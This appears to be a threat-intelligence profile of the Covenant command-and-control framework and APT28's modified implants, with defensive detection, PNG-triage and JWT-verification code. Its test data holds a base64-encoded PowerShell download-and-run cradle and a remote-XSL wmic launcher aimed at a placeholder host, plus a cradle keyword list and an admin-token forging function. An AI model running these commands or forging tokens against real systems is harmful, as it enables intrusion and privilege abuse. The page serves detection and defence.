Covenant
Covenant is an open-source .NET post-exploitation and command-and-control framework first released in February 2019. Its implants, called Grunts, check in to a Covenant listener over HTTP, and listeners can be configured with SSL/TLS to encrypt that traffic. The framework provides launchers for installing a Grunt on a target: PowerShell-based launchers, WMI-based launchers that stage the Grunt either through an XSL stylesheet fetched by wmic or through a command one-liner, and in-memory execution of .NET payloads. Grunt capabilities reported in the content include .NET assembly loading, PowerShell execution, streamed task output, and encrypted upload of results.
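The two launcher shapes described above (a PowerShell one-liner carrying an encoded command, and wmic.exe pulling a remote XSL stylesheet) leave recognizable process-creation telemetry. The following is an added example written for this page, not code from the Covenant project or from any of the cited reports: it runs two simple rules over constructed Sysmon-style Event ID 1 records. The field names follow Sysmon (Image, ParentImage, CommandLine); the values, the 192.0.2.10 address, and the file names are invented for the demo.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names,
# invented values). Events 0 and 1 imitate Covenant's wmic/XSL and PowerShell
# launchers; events 2 and 3 are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic os get /format:"http://192.0.2.10/launcher.xsl"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -Sta -Nop -Window Hidden -EncodedCommand "
                    + base64.b64encode("iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
                                       .encode("utf-16-le")).decode()},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get /format:list"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

# -e/-ec/-en/-enc/-encodedcommand followed by a base64 blob (PowerShell accepts
# unambiguous prefixes of -EncodedCommand).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# /format: pointing at a URL or an .xsl file (the trick behind the wmic launcher);
# built-in formats such as /format:list do not match.
XSL_FORMAT = re.compile(r"(?i)/format\s*:\s*\"?((?:https?|file)://[^\s\"]+|[^\s\"]+\.xsl)")
CRADLE_TERMS = ("iex", "invoke-expression", "downloadstring", "downloaddata",
                "webclient", "invoke-webrequest", "reflection.assembly")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind an -EncodedCommand flag, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(event):
    """Return a list of (rule, detail) findings for one process-creation event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    findings = []
    if image.endswith("wmic.exe"):
        m = XSL_FORMAT.search(cmd)
        if m:
            findings.append(("wmic_xsl_launcher", m.group(1)))
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            low = decoded.lower()
            rule = "powershell_encoded_cradle" if any(t in low for t in CRADLE_TERMS) \
                else "powershell_encoded_command"
            findings.append((rule, decoded))
    return findings


def hunt(events):
    """Run classify_event over a batch; returns [(event_index, (rule, detail)), ...]."""
    return [(i, f) for i, e in enumerate(events) for f in classify_event(e)]


if __name__ == "__main__":
    for idx, (rule, detail) in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

Decoding the encoded command before matching matters: the base64 blob itself carries no searchable keywords, and a rule that only fires on the flag will drown in legitimate admin automation. The wmic rule deliberately ignores the built-in output formats so that ordinary inventory commands stay quiet.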
The content links Covenant both to general offensive-security use and to multiple real-world malicious operations. It has been identified as C2 infrastructure in broader criminal ecosystems: a server at 62.233.50[.]25 was associated with LockBit 3.0 affiliate infrastructure, and Shodan and Censys reportedly labeled related Covenant infrastructure listening on port 7443, with the certificate's issuer and subject fields still carrying the framework's default value of "Covenant". VirusTotal artifacts tied to that IP included PowerShell scripts and executable payloads labeled as Covenant. A default certificate subject is a useful hunting pivot, but operators can supply their own certificate to a listener, so its absence does not clear a host.
The strongest operational association in the content is with Sednit (also tracked as APT28, Fancy Bear, and Forest Blizzard), a Russian state-sponsored group linked to GRU Unit 26165. ESET reported that from April 2024 onward Sednit reworked Covenant into a primary long-term espionage implant and deployed it alongside BeardShell for resilience. Sednit modified Covenant's execution flow, replaced random implant naming with deterministic identifiers derived from machine characteristics, and added cloud-based communication protocols through the C2Bridge framework. Reported cloud C2 providers used by Sednit's modified Covenant were pCloud in 2023, Koofr in 2024 and 2025, and Filen from July 2025. ESET observed some monitored machines remaining under surveillance for more than six months. Sednit used Covenant and BeardShell against Ukrainian military personnel, drone manufacturers, and organizations involved in drone research and development, as well as logistics and transportation companies outside Ukraine.
Multiple reports in the content describe APT28 campaigns in 2025 and 2026 delivering modified Covenant implants through spearphishing. In one infection chain exploiting CVE-2026-21509 in Microsoft Office, a malicious document triggered WebDAV retrieval of payloads, leading to COM hijacking, a scheduled task named OneDriveHealth that terminates and restarts explorer.exe (a common way to force a hijacked COM object to load), deployment of EhStoreShell.dll and SplashScreen.png, extraction of shellcode hidden in the PNG, and in-memory launch of a modified Covenant implant referred to as CovenantGrunt or PrismexStager. This implant used filen.io as its command-and-control infrastructure over HTTPS and reportedly implemented components named FilenApi, FilenMessenger, FilenEncryptor, and GruntExecutor; its handshake used a 2048-bit RSA key pair and an AES-256 session key, consistent with stock Covenant's Grunt staging exchange. Associated post-exploitation activity included reconnaissance with arp.exe, systeminfo.exe, and tracert.exe, process injection into svchost.exe, and preparation for lateral movement.
The content also states that modified Covenant variants used steganography, embedding shellcode in PNG files and extracting it at runtime, and that both BeardShell and Covenant retrieved C2 addresses from images stored in cloud services. In Operation Phantom Net Voxel and related reporting, Covenant was described as using Filen, pCloud, and Koofr for C2, with HTTPS plus an additional ChaCha20-Poly1305 encryption layer on top of TLS in the broader campaign. Reported persistence and delivery mechanisms around these campaigns included spearphishing with weaponized Office documents, VBA macros in some cases, PowerShell execution, Registry Run keys, COM hijacking, and scheduled-task abuse.
High-confidence indicators directly mentioned in the content include 62.233.50[.]25 as a Covenant C2 server; port 7443 with the default SSL subject/issuer value "Covenant" on related infrastructure; the January 2026 infection artifacts EhStoreShell.dll and SplashScreen.png; the scheduled task OneDriveHealth; malicious delivery domains freefoodaid[.]com, wellnesscaremed[.]com, wellnessmedcare[.]org, and longsauce[.]com; associated IPs 159.253.120[.]2, 193.187.148[.]169, and 23.227.202[.]14; and use of Filen-related infrastructure including filen.io and related domains. Note that Filen, pCloud, Koofr, and Icedrive are legitimate cloud services, so traffic to them is context for a hunt rather than a block-list indicator on its own; the scheduled-task name and the dropped file names are the more specific host artifacts. Overall, the content portrays Covenant as a legitimate open-source framework that threat actors, especially APT28/Sednit, have repeatedly adapted for stealthy, long-term espionage against Ukrainian and European military, government, transport, and defense-related targets.
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
In January 2026, Sednit also deployed Covenant in a series of spearphishing campaigns exploiting the CVE-2026-21509 vulnerability, as reported by CERT-UA.
Groups observed using it
5 distinct threat actors attributed by public researchers.
Across 2025 and 2026, Sednit repeatedly deployed BeardShell together with Covenant, a third major piece of its modern toolkit. Sednit heavily reworked this open-source implant to support long-term espionage and to implement a new network protocol based on yet another legitimate cloud provider.
"...execute payloads based on Donut and the Covenant post-exploitation framework."
The attackers also customized the Covenant red-team framework to route encrypted command-and-control traffic through Koofr and Icedrive cloud services, making detection difficult.
In the recent attacks, the Russian threat group paired BeardShell with a heavily modified version of the open-source Covenant .NET post-exploitation framework.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (2 techniques)
Initial Access (2 techniques)
Execution (7 techniques)
The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
...creation of a scheduled task "OneDriveHealth". Scheduled execution of the task results in the termination and restart of the explorer.exe process...
Silent Cartographer is simply an exercise in identifying the application in play (Covenant), researching any known exploits against it, retooling the published POC, executing the POC, and handling the incoming reverse shell.
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Persistence (1 technique)
Privilege Escalation (2 techniques)
Defense Evasion (2 techniques)
Steganography (T1027.003) hides the payload from file analysis: a PNG containing shellcode is not an executable file...
Background: Reflection. In .NET, reflection is the runtime feature that lets code discover and use types, methods, and load assemblies dynamically. Legitimate software uses it for plugins, dynamic loading, and tooling - but for attackers it is a defence evasion technique, similar to injection, but for managed code. They can load assemblies straight from bytes in memory, resolve method names on the fly, and execute payloads more discreetly.
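Both the summary above and the T1027.003 item say the shellcode was hidden inside PNG files and carved out at runtime, but neither says how it was embedded. The block below is an added triage example written for this page, not code from the reported implants or from any cited vendor, and it does not claim to decode the actor's format. It walks a PNG's chunk list and reports the three places a payload most often ends up: bytes appended after IEND, chunk types outside the standard set (a private chunk is the usual carrier), and chunks whose CRC no longer matches their data. The test image is constructed in memory (a 2x2 greyscale PNG) and then tampered with; stdlib only.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG spec plus common registered extensions;
# anything else deserves a look.
KNOWN_CHUNKS = {"IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
                "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME", "eXIf"}


def png_chunk(ctype, data):
    """Serialise one chunk: 4-byte length, 4-byte type, data, CRC32 over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_png(width=2, height=2):
    """Constructed test input: a minimal valid 8-bit greyscale PNG."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    # Each scanline starts with filter type 0 followed by one grey byte per pixel.
    scanlines = b"".join(b"\x00" + bytes([0x80]) * width for _ in range(height))
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanlines))
            + png_chunk(b"IEND", b""))


def scan_png(blob):
    """Walk the chunk list; return [(finding, detail), ...], empty when nothing looks odd."""
    if not blob.startswith(PNG_SIG):
        return [("bad_signature", blob[:8].hex())]
    findings = []
    pos = len(PNG_SIG)
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        name = ctype.decode("latin-1")
        data = blob[pos + 8:pos + 8 + length]
        crc = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc) < 4:
            findings.append(("truncated_chunk", name))
            return findings
        if name not in KNOWN_CHUNKS:
            # A lowercase second letter marks a private (unregistered) chunk type.
            findings.append(("unknown_chunk", f"{name} len={length} private={name[1].islower()}"))
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + data):
            findings.append(("crc_mismatch", name))
        pos += 12 + length
        if name == "IEND":
            # A well-formed file ends here; anything after IEND is not image data.
            trailing = len(blob) - pos
            if trailing:
                findings.append(("data_after_iend", f"{trailing} bytes"))
            return findings
    findings.append(("missing_iend", f"{len(blob) - pos} bytes unparsed"))
    return findings


if __name__ == "__main__":
    sample = build_png() + b"\x90\x90\xcc"  # constructed: clean image with bytes appended
    print(scan_png(sample))
```

The scan is structural only: a payload stored as pixel values inside a valid IDAT (true LSB steganography) passes it cleanly, which is why the page's point that "a PNG with shellcode is not an executable" matters for both sides. Treat a hit as a reason to carve and inspect, and treat a miss as nothing more than "the container is well-formed".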
Credential Access (1 technique)
Covenant versions prior to 0.5 all had the same JWT secret key in default builds. The JWT in Covenant is used to authenticate users to the Covenant web UI... If a user can fabricate a JWT by using the leaked JWT secret key, they can arbitrarily assign themselves admin-level credentials, log in, and wreak havoc on the server.
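The quoted issue is a textbook shared-secret failure: an HS256 JWT is only as trustworthy as the secrecy of the HMAC key, and a key baked into every default build is public. The block below is an added example written for this page, not Covenant's code; the page does not reproduce the leaked key, so SHARED_DEFAULT_KEY is a placeholder, and the claim names (sub, role) are assumptions about the token's shape rather than Covenant's actual claim set. It mints the admin token an attacker holding the key could forge, shows the server accepting it, and shows the same token failing once the key is replaced with a per-install random value. Everything is stdlib.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Hypothetical placeholder standing in for a key shared across default builds.
SHARED_DEFAULT_KEY = b"placeholder-default-key-from-appsettings"


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(claims, key):
    """Build a JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token, key, now=None):
    """Return the claims if the signature and expiry check out, else None.

    The algorithm is pinned to HS256 so an attacker cannot downgrade to alg=none
    or swap in a different scheme; the signature is compared in constant time.
    """
    try:
        header, body, sig = token.split(".")
    except ValueError:
        return None
    if json.loads(_unb64url(header)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig)):
        return None
    claims = json.loads(_unb64url(body))
    if "exp" in claims and claims["exp"] <= (now or time.time()):
        return None
    return claims


def forge_admin_token(key, username="attacker"):
    """What someone holding the leaked key can mint: a token the server treats as an admin."""
    return sign_hs256({"sub": username, "role": "Administrator",
                       "exp": int(time.time()) + 3600}, key)


def rotate_key():
    """Per-install random 256-bit key; generating it at install time is the actual fix."""
    return secrets.token_bytes(32)


if __name__ == "__main__":
    forged = forge_admin_token(SHARED_DEFAULT_KEY)
    print("accepted with shared key:", verify_hs256(forged, SHARED_DEFAULT_KEY) is not None)
    print("accepted after rotation: ", verify_hs256(forged, rotate_key()) is not None)
```

Two things follow for defenders running a Covenant server of their own: generate the signing key at install time rather than shipping it in configuration, and treat a key rotation as invalidating every existing session. The verifier's alg pinning and constant-time compare are unrelated to the leaked-key problem but are the checks that are usually missing in the same hand-rolled code.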
Discovery (1 technique)
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Collection (2 techniques)
Command and Control (9 techniques)
In addition to being associated with Chang Way, 62.233.50[.]25 is also a Covenant Command and Control (C2) server.
The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."
...uses the legitimate cloud storage service Filen (filen.io) as the infrastructure for controlling COVENANT.
BeardShell ... leverages the legitimate cloud storage service Icedrive as its C&C channel... Previously, in 2023, Sednit’s Covenant abused the legitimate cloud service pCloud, and in 2024–2025, Koofr ... Figure 11 shows the classes introduced by Sednit developers to communicate with the Filen cloud provider, used since July 2025.
Cloud C2 (Web Service, T1102.002) hides the network traffic... Command and Control - Bidirectional Communication (T1102.002): BEARDSHELL operates through the Icedrive API ... COVENANT through Filen, pCloud, Koofr.
The attackers then upgraded valuable targets to the X-Agent backdoor, often pairing it with the Sedreco loader and the X-Tunnel network pivot.
Cobalt Strike uses a command-line interface to interact with systems. Brute Ratel C4 can use cmd.exe for execution. Havoc can execute commands via cmd.exe. Covenant provides access to a Command Shell in Windows environments for follow-on command execution and tasking.
Exfiltration (3 techniques)
opening the document ... results in the establishment of a network connection to an external resource using the WebDAV protocol, and the subsequent download of a file bearing a shortcut (.lnk) file header
IOCs tracked for this family
66 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting.
Recent activity
56 sources tracked across advisories, community write-ups, and news.
Modified implant/loader used to embed shellcode into PNG files for steganographic delivery, extract it at runtime, recover C2 information from cloud-hosted images, and communicate through Filen, pCloud, and Koofr.
A customized in-memory deployment of the Covenant framework used in Operation Phantom Net Voxel as part of APT28's modern implant chain.
An implant used by Sednit against Ukrainian military personnel and drone-related organizations.
An offensive .NET framework referenced here as the basis for the modified CovenantGrunt implant used for fileless post-exploitation and cloud-based C2.